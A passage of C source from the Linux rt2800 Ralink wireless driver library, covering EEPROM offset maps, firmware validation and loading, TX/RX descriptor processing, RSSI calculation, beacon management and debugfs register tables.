[EEPROM_TXPOWER_A1] = 0x003c,
[EEPROM_TXPOWER_A2] = 0x0053,
[EEPROM_TSSI_BOUND_A1] = 0x006a,
[EEPROM_TSSI_BOUND_A2] = 0x006b,
[EEPROM_TSSI_BOUND_A3] = 0x006c,
[EEPROM_TSSI_BOUND_A4] = 0x006d,
[EEPROM_TSSI_BOUND_A5] = 0x006e,
[EEPROM_TXPOWER_BYRATE] = 0x006f,
[EEPROM_BBP_START] = 0x0078,
};
static const unsigned int rt2800_eeprom_map_ext[EEPROM_WORD_COUNT] = {
[EEPROM_CHIP_ID] = 0x0000,
[EEPROM_VERSION] = 0x0001,
[EEPROM_MAC_ADDR_0] = 0x0002,
[EEPROM_MAC_ADDR_1] = 0x0003,
[EEPROM_MAC_ADDR_2] = 0x0004,
[EEPROM_NIC_CONF0] = 0x001a,
[EEPROM_NIC_CONF1] = 0x001b,
[EEPROM_NIC_CONF2] = 0x001c,
[EEPROM_EIRP_MAX_TX_POWER] = 0x0020,
[EEPROM_FREQ] = 0x0022,
[EEPROM_LED_AG_CONF] = 0x0023,
[EEPROM_LED_ACT_CONF] = 0x0024,
[EEPROM_LED_POLARITY] = 0x0025,
[EEPROM_LNA] = 0x0026,
[EEPROM_EXT_LNA2] = 0x0027,
[EEPROM_RSSI_BG] = 0x0028,
[EEPROM_RSSI_BG2] = 0x0029,
[EEPROM_RSSI_A] = 0x002a,
[EEPROM_RSSI_A2] = 0x002b,
[EEPROM_TXPOWER_BG1] = 0x0030,
[EEPROM_TXPOWER_BG2] = 0x0037,
[EEPROM_EXT_TXPOWER_BG3] = 0x003e,
[EEPROM_TSSI_BOUND_BG1] = 0x0045,
[EEPROM_TSSI_BOUND_BG2] = 0x0046,
[EEPROM_TSSI_BOUND_BG3] = 0x0047,
[EEPROM_TSSI_BOUND_BG4] = 0x0048,
[EEPROM_TSSI_BOUND_BG5] = 0x0049,
[EEPROM_TXPOWER_A1] = 0x004b,
[EEPROM_TXPOWER_A2] = 0x0065,
[EEPROM_EXT_TXPOWER_A3] = 0x007f,
[EEPROM_TSSI_BOUND_A1] = 0x009a,
[EEPROM_TSSI_BOUND_A2] = 0x009b,
[EEPROM_TSSI_BOUND_A3] = 0x009c,
[EEPROM_TSSI_BOUND_A4] = 0x009d,
[EEPROM_TSSI_BOUND_A5] = 0x009e,
[EEPROM_TXPOWER_BYRATE] = 0x00a0,
};
static unsigned int rt2800_eeprom_word_index(struct rt2x00_dev *rt2x00dev,
const enum rt2800_eeprom_word word)
{
const unsigned int *map;
unsigned int index;
if (WARN_ONCE(word >= EEPROM_WORD_COUNT,
"%s: invalid EEPROM word %d\n",
wiphy_name(rt2x00dev->hw->wiphy), word))
return 0;
if (rt2x00_rt(rt2x00dev, RT3593))
map = rt2800_eeprom_map_ext;
else
map = rt2800_eeprom_map;
index = map[word];
/* Index 0 is valid only for EEPROM_CHIP_ID.
* Otherwise it means that the offset of the
* given word is not initialized in the map,
* or that the field is not usable on the
* actual chipset.
*/
WARN_ONCE(word != EEPROM_CHIP_ID && index == 0,
"%s: invalid access of EEPROM word %d\n",
wiphy_name(rt2x00dev->hw->wiphy), word);
return index;
}
static void *rt2800_eeprom_addr(struct rt2x00_dev *rt2x00dev,
const enum rt2800_eeprom_word word)
{
unsigned int index;
index = rt2800_eeprom_word_index(rt2x00dev, word);
return rt2x00_eeprom_addr(rt2x00dev, index);
}
static void rt2800_eeprom_read(struct rt2x00_dev *rt2x00dev,
const enum rt2800_eeprom_word word, u16 *data)
{
unsigned int index;
index = rt2800_eeprom_word_index(rt2x00dev, word);
rt2x00_eeprom_read(rt2x00dev, index, data);
}
static void rt2800_eeprom_write(struct rt2x00_dev *rt2x00dev,
const enum rt2800_eeprom_word word, u16 data)
{
unsigned int index;
index = rt2800_eeprom_word_index(rt2x00dev, word);
rt2x00_eeprom_write(rt2x00dev, index, data);
}
static void rt2800_eeprom_read_from_array(struct rt2x00_dev *rt2x00dev,
const enum rt2800_eeprom_word array,
unsigned int offset,
u16 *data)
{
unsigned int index;
index = rt2800_eeprom_word_index(rt2x00dev, array);
rt2x00_eeprom_read(rt2x00dev, index + offset, data);
}
static int rt2800_enable_wlan_rt3290(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
int i, count;
rt2800_register_read(rt2x00dev, WLAN_FUN_CTRL, ®);
if (rt2x00_get_field32(reg, WLAN_EN))
return 0;
rt2x00_set_field32(®, WLAN_GPIO_OUT_OE_BIT_ALL, 0xff);
rt2x00_set_field32(®, FRC_WL_ANT_SET, 1);
rt2x00_set_field32(®, WLAN_CLK_EN, 0);
rt2x00_set_field32(®, WLAN_EN, 1);
rt2800_register_write(rt2x00dev, WLAN_FUN_CTRL, reg);
udelay(REGISTER_BUSY_DELAY);
count = 0;
do {
/*
* Check PLL_LD & XTAL_RDY.
*/
for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
rt2800_register_read(rt2x00dev, CMB_CTRL, ®);
if (rt2x00_get_field32(reg, PLL_LD) &&
rt2x00_get_field32(reg, XTAL_RDY))
break;
udelay(REGISTER_BUSY_DELAY);
}
if (i >= REGISTER_BUSY_COUNT) {
if (count >= 10)
return -EIO;
rt2800_register_write(rt2x00dev, 0x58, 0x018);
udelay(REGISTER_BUSY_DELAY);
rt2800_register_write(rt2x00dev, 0x58, 0x418);
udelay(REGISTER_BUSY_DELAY);
rt2800_register_write(rt2x00dev, 0x58, 0x618);
udelay(REGISTER_BUSY_DELAY);
count++;
} else {
count = 0;
}
rt2800_register_read(rt2x00dev, WLAN_FUN_CTRL, ®);
rt2x00_set_field32(®, PCIE_APP0_CLK_REQ, 0);
rt2x00_set_field32(®, WLAN_CLK_EN, 1);
rt2x00_set_field32(®, WLAN_RESET, 1);
rt2800_register_write(rt2x00dev, WLAN_FUN_CTRL, reg);
udelay(10);
rt2x00_set_field32(®, WLAN_RESET, 0);
rt2800_register_write(rt2x00dev, WLAN_FUN_CTRL, reg);
udelay(10);
rt2800_register_write(rt2x00dev, INT_SOURCE_CSR, 0x7fffffff);
} while (count != 0);
return 0;
}
void rt2800_mcu_request(struct rt2x00_dev *rt2x00dev,
const u8 command, const u8 token,
const u8 arg0, const u8 arg1)
{
u32 reg;
/*
* SOC devices don't support MCU requests.
*/
if (rt2x00_is_soc(rt2x00dev))
return;
mutex_lock(&rt2x00dev->csr_mutex);
/*
* Wait until the MCU becomes available, afterwards we
* can safely write the new data into the register.
*/
if (WAIT_FOR_MCU(rt2x00dev, ®)) {
rt2x00_set_field32(®, H2M_MAILBOX_CSR_OWNER, 1);
rt2x00_set_field32(®, H2M_MAILBOX_CSR_CMD_TOKEN, token);
rt2x00_set_field32(®, H2M_MAILBOX_CSR_ARG0, arg0);
rt2x00_set_field32(®, H2M_MAILBOX_CSR_ARG1, arg1);
rt2800_register_write_lock(rt2x00dev, H2M_MAILBOX_CSR, reg);
reg = 0;
rt2x00_set_field32(®, HOST_CMD_CSR_HOST_COMMAND, command);
rt2800_register_write_lock(rt2x00dev, HOST_CMD_CSR, reg);
}
mutex_unlock(&rt2x00dev->csr_mutex);
}
EXPORT_SYMBOL_GPL(rt2800_mcu_request);
int rt2800_wait_csr_ready(struct rt2x00_dev *rt2x00dev)
{
unsigned int i = 0;
u32 reg;
for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
rt2800_register_read(rt2x00dev, MAC_CSR0, ®);
if (reg && reg != ~0)
return 0;
msleep(1);
}
rt2x00_err(rt2x00dev, "Unstable hardware\n");
return -EBUSY;
}
EXPORT_SYMBOL_GPL(rt2800_wait_csr_ready);
int rt2800_wait_wpdma_ready(struct rt2x00_dev *rt2x00dev)
{
unsigned int i;
u32 reg;
/*
* Some devices are really slow to respond here. Wait a whole second
* before timing out.
*/
for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
rt2800_register_read(rt2x00dev, WPDMA_GLO_CFG, ®);
if (!rt2x00_get_field32(reg, WPDMA_GLO_CFG_TX_DMA_BUSY) &&
!rt2x00_get_field32(reg, WPDMA_GLO_CFG_RX_DMA_BUSY))
return 0;
msleep(10);
}
rt2x00_err(rt2x00dev, "WPDMA TX/RX busy [0x%08x]\n", reg);
return -EACCES;
}
EXPORT_SYMBOL_GPL(rt2800_wait_wpdma_ready);
void rt2800_disable_wpdma(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
rt2800_register_read(rt2x00dev, WPDMA_GLO_CFG, ®);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_TX_DMA, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_TX_DMA_BUSY, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_RX_DMA, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_RX_DMA_BUSY, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_TX_WRITEBACK_DONE, 1);
rt2800_register_write(rt2x00dev, WPDMA_GLO_CFG, reg);
}
EXPORT_SYMBOL_GPL(rt2800_disable_wpdma);
void rt2800_get_txwi_rxwi_size(struct rt2x00_dev *rt2x00dev,
unsigned short *txwi_size,
unsigned short *rxwi_size)
{
switch (rt2x00dev->chip.rt) {
case RT3593:
*txwi_size = TXWI_DESC_SIZE_4WORDS;
*rxwi_size = RXWI_DESC_SIZE_5WORDS;
break;
case RT5592:
*txwi_size = TXWI_DESC_SIZE_5WORDS;
*rxwi_size = RXWI_DESC_SIZE_6WORDS;
break;
default:
*txwi_size = TXWI_DESC_SIZE_4WORDS;
*rxwi_size = RXWI_DESC_SIZE_4WORDS;
break;
}
}
EXPORT_SYMBOL_GPL(rt2800_get_txwi_rxwi_size);
static bool rt2800_check_firmware_crc(const u8 *data, const size_t len)
{
u16 fw_crc;
u16 crc;
/*
* The last 2 bytes in the firmware array are the crc checksum itself,
* this means that we should never pass those 2 bytes to the crc
* algorithm.
*/
fw_crc = (data[len - 2] << 8 | data[len - 1]);
/*
* Use the crc ccitt algorithm.
* This will return the same value as the legacy driver which
* used bit ordering reversion on the both the firmware bytes
* before input input as well as on the final output.
* Obviously using crc ccitt directly is much more efficient.
*/
crc = crc_ccitt(~0, data, len - 2);
/*
* There is a small difference between the crc-itu-t + bitrev and
* the crc-ccitt crc calculation. In the latter method the 2 bytes
* will be swapped, use swab16 to convert the crc to the correct
* value.
*/
crc = swab16(crc);
return fw_crc == crc;
}
int rt2800_check_firmware(struct rt2x00_dev *rt2x00dev,
const u8 *data, const size_t len)
{
size_t offset = 0;
size_t fw_len;
bool multiple;
/*
* PCI(e) & SOC devices require firmware with a length
* of 8kb. USB devices require firmware files with a length
* of 4kb. Certain USB chipsets however require different firmware,
* which Ralink only provides attached to the original firmware
* file. Thus for USB devices, firmware files have a length
* which is a multiple of 4kb. The firmware for rt3290 chip also
* have a length which is a multiple of 4kb.
*/
if (rt2x00_is_usb(rt2x00dev) || rt2x00_rt(rt2x00dev, RT3290))
fw_len = 4096;
else
fw_len = 8192;
multiple = true;
/*
* Validate the firmware length
*/
if (len != fw_len && (!multiple || (len % fw_len) != 0))
return FW_BAD_LENGTH;
/*
* Check if the chipset requires one of the upper parts
* of the firmware.
*/
if (rt2x00_is_usb(rt2x00dev) &&
!rt2x00_rt(rt2x00dev, RT2860) &&
!rt2x00_rt(rt2x00dev, RT2872) &&
!rt2x00_rt(rt2x00dev, RT3070) &&
((len / fw_len) == 1))
return FW_BAD_VERSION;
/*
* 8kb firmware files must be checked as if it were
* 2 separate firmware files.
*/
while (offset < len) {
if (!rt2800_check_firmware_crc(data + offset, fw_len))
return FW_BAD_CRC;
offset += fw_len;
}
return FW_OK;
}
EXPORT_SYMBOL_GPL(rt2800_check_firmware);
int rt2800_load_firmware(struct rt2x00_dev *rt2x00dev,
const u8 *data, const size_t len)
{
unsigned int i;
u32 reg;
int retval;
if (rt2x00_rt(rt2x00dev, RT3290)) {
retval = rt2800_enable_wlan_rt3290(rt2x00dev);
if (retval)
return -EBUSY;
}
/*
* If driver doesn't wake up firmware here,
* rt2800_load_firmware will hang forever when interface is up again.
*/
rt2800_register_write(rt2x00dev, AUTOWAKEUP_CFG, 0x00000000);
/*
* Wait for stable hardware.
*/
if (rt2800_wait_csr_ready(rt2x00dev))
return -EBUSY;
if (rt2x00_is_pci(rt2x00dev)) {
if (rt2x00_rt(rt2x00dev, RT3290) ||
rt2x00_rt(rt2x00dev, RT3572) ||
rt2x00_rt(rt2x00dev, RT5390) ||
rt2x00_rt(rt2x00dev, RT5392)) {
rt2800_register_read(rt2x00dev, AUX_CTRL, ®);
rt2x00_set_field32(®, AUX_CTRL_FORCE_PCIE_CLK, 1);
rt2x00_set_field32(®, AUX_CTRL_WAKE_PCIE_EN, 1);
rt2800_register_write(rt2x00dev, AUX_CTRL, reg);
}
rt2800_register_write(rt2x00dev, PWR_PIN_CFG, 0x00000002);
}
rt2800_disable_wpdma(rt2x00dev);
/*
* Write firmware to the device.
*/
rt2800_drv_write_firmware(rt2x00dev, data, len);
/*
* Wait for device to stabilize.
*/
for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
rt2800_register_read(rt2x00dev, PBF_SYS_CTRL, ®);
if (rt2x00_get_field32(reg, PBF_SYS_CTRL_READY))
break;
msleep(1);
}
if (i == REGISTER_BUSY_COUNT) {
rt2x00_err(rt2x00dev, "PBF system register not ready\n");
return -EBUSY;
}
/*
* Disable DMA, will be reenabled later when enabling
* the radio.
*/
rt2800_disable_wpdma(rt2x00dev);
/*
* Initialize firmware.
*/
rt2800_register_write(rt2x00dev, H2M_BBP_AGENT, 0);
rt2800_register_write(rt2x00dev, H2M_MAILBOX_CSR, 0);
if (rt2x00_is_usb(rt2x00dev)) {
rt2800_register_write(rt2x00dev, H2M_INT_SRC, 0);
rt2800_mcu_request(rt2x00dev, MCU_BOOT_SIGNAL, 0, 0, 0);
}
msleep(1);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_load_firmware);
void rt2800_write_tx_data(struct queue_entry *entry,
struct txentry_desc *txdesc)
{
__le32 *txwi = rt2800_drv_get_txwi(entry);
u32 word;
int i;
/*
* Initialize TX Info descriptor
*/
rt2x00_desc_read(txwi, 0, &word);
rt2x00_set_field32(&word, TXWI_W0_FRAG,
test_bit(ENTRY_TXD_MORE_FRAG, &txdesc->flags));
rt2x00_set_field32(&word, TXWI_W0_MIMO_PS,
test_bit(ENTRY_TXD_HT_MIMO_PS, &txdesc->flags));
rt2x00_set_field32(&word, TXWI_W0_CF_ACK, 0);
rt2x00_set_field32(&word, TXWI_W0_TS,
test_bit(ENTRY_TXD_REQ_TIMESTAMP, &txdesc->flags));
rt2x00_set_field32(&word, TXWI_W0_AMPDU,
test_bit(ENTRY_TXD_HT_AMPDU, &txdesc->flags));
rt2x00_set_field32(&word, TXWI_W0_MPDU_DENSITY,
txdesc->u.ht.mpdu_density);
rt2x00_set_field32(&word, TXWI_W0_TX_OP, txdesc->u.ht.txop);
rt2x00_set_field32(&word, TXWI_W0_MCS, txdesc->u.ht.mcs);
rt2x00_set_field32(&word, TXWI_W0_BW,
test_bit(ENTRY_TXD_HT_BW_40, &txdesc->flags));
rt2x00_set_field32(&word, TXWI_W0_SHORT_GI,
test_bit(ENTRY_TXD_HT_SHORT_GI, &txdesc->flags));
rt2x00_set_field32(&word, TXWI_W0_STBC, txdesc->u.ht.stbc);
rt2x00_set_field32(&word, TXWI_W0_PHYMODE, txdesc->rate_mode);
rt2x00_desc_write(txwi, 0, word);
rt2x00_desc_read(txwi, 1, &word);
rt2x00_set_field32(&word, TXWI_W1_ACK,
test_bit(ENTRY_TXD_ACK, &txdesc->flags));
rt2x00_set_field32(&word, TXWI_W1_NSEQ,
test_bit(ENTRY_TXD_GENERATE_SEQ, &txdesc->flags));
rt2x00_set_field32(&word, TXWI_W1_BW_WIN_SIZE, txdesc->u.ht.ba_size);
rt2x00_set_field32(&word, TXWI_W1_WIRELESS_CLI_ID,
test_bit(ENTRY_TXD_ENCRYPT, &txdesc->flags) ?
txdesc->key_idx : txdesc->u.ht.wcid);
rt2x00_set_field32(&word, TXWI_W1_MPDU_TOTAL_BYTE_COUNT,
txdesc->length);
rt2x00_set_field32(&word, TXWI_W1_PACKETID_QUEUE, entry->queue->qid);
rt2x00_set_field32(&word, TXWI_W1_PACKETID_ENTRY, (entry->entry_idx % 3) + 1);
rt2x00_desc_write(txwi, 1, word);
/*
* Always write 0 to IV/EIV fields (word 2 and 3), hardware will insert
* the IV from the IVEIV register when TXD_W3_WIV is set to 0.
* When TXD_W3_WIV is set to 1 it will use the IV data
* from the descriptor. The TXWI_W1_WIRELESS_CLI_ID indicates which
* crypto entry in the registers should be used to encrypt the frame.
*
* Nulify all remaining words as well, we don't know how to program them.
*/
for (i = 2; i < entry->queue->winfo_size / sizeof(__le32); i++)
_rt2x00_desc_write(txwi, i, 0);
}
EXPORT_SYMBOL_GPL(rt2800_write_tx_data);
static int rt2800_agc_to_rssi(struct rt2x00_dev *rt2x00dev, u32 rxwi_w2)
{
s8 rssi0 = rt2x00_get_field32(rxwi_w2, RXWI_W2_RSSI0);
s8 rssi1 = rt2x00_get_field32(rxwi_w2, RXWI_W2_RSSI1);
s8 rssi2 = rt2x00_get_field32(rxwi_w2, RXWI_W2_RSSI2);
u16 eeprom;
u8 offset0;
u8 offset1;
u8 offset2;
if (rt2x00dev->curr_band == IEEE80211_BAND_2GHZ) {
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG, &eeprom);
offset0 = rt2x00_get_field16(eeprom, EEPROM_RSSI_BG_OFFSET0);
offset1 = rt2x00_get_field16(eeprom, EEPROM_RSSI_BG_OFFSET1);
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG2, &eeprom);
offset2 = rt2x00_get_field16(eeprom, EEPROM_RSSI_BG2_OFFSET2);
} else {
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A, &eeprom);
offset0 = rt2x00_get_field16(eeprom, EEPROM_RSSI_A_OFFSET0);
offset1 = rt2x00_get_field16(eeprom, EEPROM_RSSI_A_OFFSET1);
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A2, &eeprom);
offset2 = rt2x00_get_field16(eeprom, EEPROM_RSSI_A2_OFFSET2);
}
/*
* Convert the value from the descriptor into the RSSI value
* If the value in the descriptor is 0, it is considered invalid
* and the default (extremely low) rssi value is assumed
*/
rssi0 = (rssi0) ? (-12 - offset0 - rt2x00dev->lna_gain - rssi0) : -128;
rssi1 = (rssi1) ? (-12 - offset1 - rt2x00dev->lna_gain - rssi1) : -128;
rssi2 = (rssi2) ? (-12 - offset2 - rt2x00dev->lna_gain - rssi2) : -128;
/*
* mac80211 only accepts a single RSSI value. Calculating the
* average doesn't deliver a fair answer either since -60:-60 would
* be considered equally good as -50:-70 while the second is the one
* which gives less energy...
*/
rssi0 = max(rssi0, rssi1);
return (int)max(rssi0, rssi2);
}
void rt2800_process_rxwi(struct queue_entry *entry,
struct rxdone_entry_desc *rxdesc)
{
__le32 *rxwi = (__le32 *) entry->skb->data;
u32 word;
rt2x00_desc_read(rxwi, 0, &word);
rxdesc->cipher = rt2x00_get_field32(word, RXWI_W0_UDF);
rxdesc->size = rt2x00_get_field32(word, RXWI_W0_MPDU_TOTAL_BYTE_COUNT);
rt2x00_desc_read(rxwi, 1, &word);
if (rt2x00_get_field32(word, RXWI_W1_SHORT_GI))
rxdesc->flags |= RX_FLAG_SHORT_GI;
if (rt2x00_get_field32(word, RXWI_W1_BW))
rxdesc->flags |= RX_FLAG_40MHZ;
/*
* Detect RX rate, always use MCS as signal type.
*/
rxdesc->dev_flags |= RXDONE_SIGNAL_MCS;
rxdesc->signal = rt2x00_get_field32(word, RXWI_W1_MCS);
rxdesc->rate_mode = rt2x00_get_field32(word, RXWI_W1_PHYMODE);
/*
* Mask of 0x8 bit to remove the short preamble flag.
*/
if (rxdesc->rate_mode == RATE_MODE_CCK)
rxdesc->signal &= ~0x8;
rt2x00_desc_read(rxwi, 2, &word);
/*
* Convert descriptor AGC value to RSSI value.
*/
rxdesc->rssi = rt2800_agc_to_rssi(entry->queue->rt2x00dev, word);
/*
* Remove RXWI descriptor from start of the buffer.
*/
skb_pull(entry->skb, entry->queue->winfo_size);
}
EXPORT_SYMBOL_GPL(rt2800_process_rxwi);
void rt2800_txdone_entry(struct queue_entry *entry, u32 status, __le32 *txwi)
{
struct rt2x00_dev *rt2x00dev = entry->queue->rt2x00dev;
struct skb_frame_desc *skbdesc = get_skb_frame_desc(entry->skb);
struct txdone_entry_desc txdesc;
u32 word;
u16 mcs, real_mcs;
int aggr, ampdu;
/*
* Obtain the status about this packet.
*/
txdesc.flags = 0;
rt2x00_desc_read(txwi, 0, &word);
mcs = rt2x00_get_field32(word, TXWI_W0_MCS);
ampdu = rt2x00_get_field32(word, TXWI_W0_AMPDU);
real_mcs = rt2x00_get_field32(status, TX_STA_FIFO_MCS);
aggr = rt2x00_get_field32(status, TX_STA_FIFO_TX_AGGRE);
/*
* If a frame was meant to be sent as a single non-aggregated MPDU
* but ended up in an aggregate the used tx rate doesn't correlate
* with the one specified in the TXWI as the whole aggregate is sent
* with the same rate.
*
* For example: two frames are sent to rt2x00, the first one sets
* AMPDU=1 and requests MCS7 whereas the second frame sets AMDPU=0
* and requests MCS15. If the hw aggregates both frames into one
* AMDPU the tx status for both frames will contain MCS7 although
* the frame was sent successfully.
*
* Hence, replace the requested rate with the real tx rate to not
* confuse the rate control algortihm by providing clearly wrong
* data.
*/
if (unlikely(aggr == 1 && ampdu == 0 && real_mcs != mcs)) {
skbdesc->tx_rate_idx = real_mcs;
mcs = real_mcs;
}
if (aggr == 1 || ampdu == 1)
__set_bit(TXDONE_AMPDU, &txdesc.flags);
/*
* Ralink has a retry mechanism using a global fallback
* table. We setup this fallback table to try the immediate
* lower rate for all rates. In the TX_STA_FIFO, the MCS field
* always contains the MCS used for the last transmission, be
* it successful or not.
*/
if (rt2x00_get_field32(status, TX_STA_FIFO_TX_SUCCESS)) {
/*
* Transmission succeeded. The number of retries is
* mcs - real_mcs
*/
__set_bit(TXDONE_SUCCESS, &txdesc.flags);
txdesc.retry = ((mcs > real_mcs) ? mcs - real_mcs : 0);
} else {
/*
* Transmission failed. The number of retries is
* always 7 in this case (for a total number of 8
* frames sent).
*/
__set_bit(TXDONE_FAILURE, &txdesc.flags);
txdesc.retry = rt2x00dev->long_retry;
}
/*
* the frame was retried at least once
* -> hw used fallback rates
*/
if (txdesc.retry)
__set_bit(TXDONE_FALLBACK, &txdesc.flags);
rt2x00lib_txdone(entry, &txdesc);
}
EXPORT_SYMBOL_GPL(rt2800_txdone_entry);
static unsigned int rt2800_hw_beacon_base(struct rt2x00_dev *rt2x00dev,
unsigned int index)
{
return HW_BEACON_BASE(index);
}
static inline u8 rt2800_get_beacon_offset(struct rt2x00_dev *rt2x00dev,
unsigned int index)
{
return BEACON_BASE_TO_OFFSET(rt2800_hw_beacon_base(rt2x00dev, index));
}
static void rt2800_update_beacons_setup(struct rt2x00_dev *rt2x00dev)
{
struct data_queue *queue = rt2x00dev->bcn;
struct queue_entry *entry;
int i, bcn_num = 0;
u64 off, reg = 0;
u32 bssid_dw1;
/*
* Setup offsets of all active beacons in BCN_OFFSET{0,1} registers.
*/
for (i = 0; i < queue->limit; i++) {
entry = &queue->entries[i];
if (!test_bit(ENTRY_BCN_ENABLED, &entry->flags))
continue;
off = rt2800_get_beacon_offset(rt2x00dev, entry->entry_idx);
reg |= off << (8 * bcn_num);
bcn_num++;
}
WARN_ON_ONCE(bcn_num != rt2x00dev->intf_beaconing);
rt2800_register_write(rt2x00dev, BCN_OFFSET0, (u32) reg);
rt2800_register_write(rt2x00dev, BCN_OFFSET1, (u32) (reg >> 32));
/*
* H/W sends up to MAC_BSSID_DW1_BSS_BCN_NUM + 1 consecutive beacons.
*/
rt2800_register_read(rt2x00dev, MAC_BSSID_DW1, &bssid_dw1);
rt2x00_set_field32(&bssid_dw1, MAC_BSSID_DW1_BSS_BCN_NUM,
bcn_num > 0 ? bcn_num - 1 : 0);
rt2800_register_write(rt2x00dev, MAC_BSSID_DW1, bssid_dw1);
}
void rt2800_write_beacon(struct queue_entry *entry, struct txentry_desc *txdesc)
{
struct rt2x00_dev *rt2x00dev = entry->queue->rt2x00dev;
struct skb_frame_desc *skbdesc = get_skb_frame_desc(entry->skb);
unsigned int beacon_base;
unsigned int padding_len;
u32 orig_reg, reg;
const int txwi_desc_size = entry->queue->winfo_size;
/*
* Disable beaconing while we are reloading the beacon data,
* otherwise we might be sending out invalid data.
*/
rt2800_register_read(rt2x00dev, BCN_TIME_CFG, ®);
orig_reg = reg;
rt2x00_set_field32(®, BCN_TIME_CFG_BEACON_GEN, 0);
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);
/*
* Add space for the TXWI in front of the skb.
*/
memset(skb_push(entry->skb, txwi_desc_size), 0, txwi_desc_size);
/*
* Register descriptor details in skb frame descriptor.
*/
skbdesc->flags |= SKBDESC_DESC_IN_SKB;
skbdesc->desc = entry->skb->data;
skbdesc->desc_len = txwi_desc_size;
/*
* Add the TXWI for the beacon to the skb.
*/
rt2800_write_tx_data(entry, txdesc);
/*
* Dump beacon to userspace through debugfs.
*/
rt2x00debug_dump_frame(rt2x00dev, DUMP_FRAME_BEACON, entry->skb);
/*
* Write entire beacon with TXWI and padding to register.
*/
padding_len = roundup(entry->skb->len, 4) - entry->skb->len;
if (padding_len && skb_pad(entry->skb, padding_len)) {
rt2x00_err(rt2x00dev, "Failure padding beacon, aborting\n");
/* skb freed by skb_pad() on failure */
entry->skb = NULL;
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, orig_reg);
return;
}
beacon_base = rt2800_hw_beacon_base(rt2x00dev, entry->entry_idx);
rt2800_register_multiwrite(rt2x00dev, beacon_base, entry->skb->data,
entry->skb->len + padding_len);
__set_bit(ENTRY_BCN_ENABLED, &entry->flags);
/*
* Change global beacons settings.
*/
rt2800_update_beacons_setup(rt2x00dev);
/*
* Restore beaconing state.
*/
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, orig_reg);
/*
* Clean up beacon skb.
*/
dev_kfree_skb_any(entry->skb);
entry->skb = NULL;
}
EXPORT_SYMBOL_GPL(rt2800_write_beacon);
static inline void rt2800_clear_beacon_register(struct rt2x00_dev *rt2x00dev,
unsigned int index)
{
int i;
const int txwi_desc_size = rt2x00dev->bcn->winfo_size;
unsigned int beacon_base;
beacon_base = rt2800_hw_beacon_base(rt2x00dev, index);
/*
* For the Beacon base registers we only need to clear
* the whole TXWI which (when set to 0) will invalidate
* the entire beacon.
*/
for (i = 0; i < txwi_desc_size; i += sizeof(__le32))
rt2800_register_write(rt2x00dev, beacon_base + i, 0);
}
void rt2800_clear_beacon(struct queue_entry *entry)
{
struct rt2x00_dev *rt2x00dev = entry->queue->rt2x00dev;
u32 orig_reg, reg;
/*
* Disable beaconing while we are reloading the beacon data,
* otherwise we might be sending out invalid data.
*/
rt2800_register_read(rt2x00dev, BCN_TIME_CFG, &orig_reg);
reg = orig_reg;
rt2x00_set_field32(®, BCN_TIME_CFG_BEACON_GEN, 0);
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);
/*
* Clear beacon.
*/
rt2800_clear_beacon_register(rt2x00dev, entry->entry_idx);
__clear_bit(ENTRY_BCN_ENABLED, &entry->flags);
/*
* Change global beacons settings.
*/
rt2800_update_beacons_setup(rt2x00dev);
/*
* Restore beaconing state.
*/
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, orig_reg);
}
EXPORT_SYMBOL_GPL(rt2800_clear_beacon);
#ifdef CPTCFG_RT2X00_LIB_DEBUGFS
const struct rt2x00debug rt2800_rt2x00debug = {
.owner = THIS_MODULE,
.csr = {
.read = rt2800_register_read,
.write = rt2800_register_write,
.flags = RT2X00DEBUGFS_OFFSET,
.word_base = CSR_REG_BASE,
.word_size = sizeof(u32),
.word_count = CSR_REG_SIZE / sizeof(u32),
},
.eeprom = {
/* NOTE: The local EEPROM access functions can't
* be used here, use the generic versions instead.
*/
.read = rt2x00_eeprom_read,
.write = rt2x00_eeprom_write,
.word_base = EEPROM_BASE,
.word_size = sizeof(u16),
.word_count = EEPROM_SIZE / sizeof(u16),
},
.bbp = {
.read = rt2800_bbp_read,
.write = rt2800_bbp_write,
.word_base = BBP_BASE,
.word_size = sizeof(u8),
.word_count = BBP_SIZE / sizeof(u8),
},
.rf = {
.read = rt2x00_rf_read,
.write = rt2800_rf_write,
.word_base = RF_BASE,
.word_size = sizeof(u32),
.word_count = RF_SIZE / sizeof(u32),
},
.rfcsr = {
.read = rt2800_rfcsr_read,
.write = rt2800_rfcsr_write,
.word_base = RFCSR_BASE,
.word_size = sizeof(u8),
.word_count = RFCSR_SIZE / sizeof(u8),
},
};
EXPORT_SYMBOL_GPL(rt2800_rt2x00debug);
#endif /* CPTCFG_RT2X00_LIB_DEBUGFS */
int rt2800_rfkill_poll(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
if (rt2x00_rt(rt2x00dev, RT3290)) {
rt2800_register_read(rt2x00dev, WLAN_FUN_CTRL, ®);
return rt2x00_get_field32(reg, WLAN_GPIO_IN_BIT0);
} else {
rt2800_register_read(rt2x00dev, GPIO_CTRL, ®);
return rt2x00_get_field32(reg, GPIO_CTRL_VAL2);
}
}
EXPORT_SYMBOL_GPL(rt2800_rfkill_poll);
#ifdef CPTCFG_RT2X00_LIB_LEDS
static void rt2800_brightness_set(struct led_classdev *led_cdev,
enum led_brightness brightness)
{
struct rt2x00_led *led =
container_of(led_cdev, struct rt2x00_led, led_dev);
unsigned int enabled = brightness != LED_OFF;
unsigned int bg_mode =
(enabled && led->rt2x00dev->curr_band == IEEE80211_BAND_2GHZ);
unsigned int polarity =
